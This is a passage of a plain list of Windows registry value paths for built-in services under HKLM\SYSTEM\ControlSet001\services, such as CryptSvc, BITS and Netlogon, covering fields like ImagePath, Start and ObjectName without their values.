HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Start
